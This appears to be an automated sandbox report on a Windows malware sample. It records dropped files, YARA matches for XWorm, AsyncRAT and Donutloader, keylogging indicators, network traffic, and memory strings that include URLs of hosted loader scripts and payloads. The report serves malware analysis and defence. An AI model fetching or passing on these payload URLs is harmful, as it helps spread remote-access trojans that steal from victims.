Source: svchost.exe, 0000004B.00000003.1768359017.0000015D23849000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com
Source: powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/43a1723/test/releases/download/siu/lmaoxclienX
Source: powershell.exe, 00000033.00000002.1811615016.000002B200ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/43a1723/test/releases/download/siu/lmaoxclient
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A5E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A5DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/SryxenBuilt.bin
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/X
Source: powershell.exe, 00000029.00000002.1901021615.0000016D184F8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A3F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000029.00000002.1904552282.0000016D187D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/evilbytecode/sryxen/releases/download/v1.0.0/sryxen_loader.ps1
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B3D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B20050D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1BAA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2054332439.0000016D2A245000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A57B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000033.00000002.1811615016.000002B200C25000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com
Source: powershell.exe, 00000033.00000002.1811615016.000002B200BC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/805647875/b2a5a7dc-5521
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1A5E2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/bd478a68-b939
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1A55D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.1905889415.0000016D1B7AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubusercontent.com/github-production-release-asset-2e65be/884985882/df985353-b412
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B7D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://objects.githubuserconth
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000029.00000002.1905889415.0000016D1B869000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX
Source: spreadmalware.exe, 00000001.00000002.1293213738.000000001B97C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pastejustit.com/raw/msdcgy3bxg
Source: powershell.exe, 00000033.00000002.1811615016.000002B2004AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.gith
Source: powershell.exe, 00000033.00000002.1811615016.000002B2007E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/Ip
Source: mshta.exe, 0000001B.00000002.1488443583.000001C85E520000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/download.
Source: mshta.exe, 00000021.00000002.1585562631.000002597AB3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/main/download.ps1
Source: powershell.exe, 00000033.00000002.1811615016.000002B20008A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/43a1723/test/refs/heads/main/shellcode/loaderclient.ps1
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.ca-central-1.wasabisys.com
Source: spreadmalware.exe, 00000001.00000002.1292529153.0000000002A67000.00000004.00000800.00020000.00000000.sdmp, spreadmalware.exe, 00000001.00000002.1292529153.00000000029FF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://s3.ca-central-1.wasabisys.com/anonsharing/9c/9c2dfd66df63d4dc503e26f209bb1294?response-conte
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sigma.dreamhosters.com/
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sigma.dreamhosters.com/C:
Source: powershell.exe, 00000029.00000002.1870747846.000000C00007B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sigma.dreamhosters.com/User-Agent:
Source: powershell.exe, 00000029.00000002.1870747846.000000C00029C000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://sigma.drform-data;

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50010
Source: unknown	Network traffic detected: HTTP traffic on port 49859 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49938
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49859
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49936
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49855
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 50010 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49936 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49855 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 49848 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49848
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49963
Source: unknown	Network traffic detected: HTTP traffic on port 49863 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49963 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49955
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49952
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 49952 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50000
Source: unknown	Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50005
Source: unknown	Network traffic detected: HTTP traffic on port 49938 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49955 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 178.159.12.230:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 38.143.146.102:443 -> 192.168.2.7:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49847 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49848 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49849 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49856 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49859 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49869 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:49938 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49939 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.7:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49948 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.7:49952 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.7:50000 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50010 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, XLogger.cs	.Net Code: KeyboardLayout

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000033.00000002.1811615016.000002B200C5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000033.00000002.2579212650.000002B268D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000033.00000002.1811615016.000002B200C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe

Jump to dropped file

Source: C:\Windows\System32\ReAgentc.exe	File created: C:\Windows\Logs\ReAgent
Source: C:\Windows\System32\ReAgentc.exe	File created: C:\Windows\Logs\ReAgent\ReAgent.log
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\spreadmalware.exe	Code function: 1_2_00007FFAAC491651	1_2_00007FFAAC491651
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 41_2_00007FFAA9EB3029	41_2_00007FFAA9EB3029
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9C578	51_2_000002B268D9C578
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9B2C0	51_2_000002B268D9B2C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9D45C	51_2_000002B268D9D45C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9FC54	51_2_000002B268D9FC54
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9C9A8	51_2_000002B268D9C9A8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 51_2_000002B268D9C19C	51_2_000002B268D9C19C

Source: spreadmalware.exe, 00000001.00000002.1291960958.0000000000B1C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs spreadmalware.exe
Source: spreadmalware.exe, 00000001.00000000.1241676462.0000000000694000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilename8VNxkyHZnnOi89e.exe4 vs spreadmalware.exe

Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: spreadmalware.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 51.2.powershell.exe.2b268dd0000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 51.2.powershell.exe.2b2016349c0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000033.00000002.1811615016.000002B200C5D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
Source: 00000033.00000002.2580091551.000002B268DD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000033.00000002.1811615016.000002B2014FE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000033.00000002.2579212650.000002B268D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000033.00000002.1811615016.000002B200C73000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: spreadmalware.exe, BEentNSOVA5WLrY8wP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: spreadmalware.exe, BEentNSOVA5WLrY8wP.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, Helper.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, AlgorithmAES.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 51.2.powershell.exe.2b2016349c0.0.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 51.2.powershell.exe.2b268dd0000.1.raw.unpack, ClientSocket.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@155/97@8/11

Source: C:\Users\user\Desktop\spreadmalware.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\spreadmalware.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3900:120:WilError_03
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:7512:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7876:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\3575659c-bb47-448e-a514-22865732bbc
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7344:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6920:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\6lFXjUqCtT3P20q9
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1316:120:WilError_03
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe	Mutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_-508009730
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2980:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f2bbsgdm.m20.ps1

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\25dca945b15f4655bca60c1711d28b29fa42bd66626c56f1b728c5fc4296d6e5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
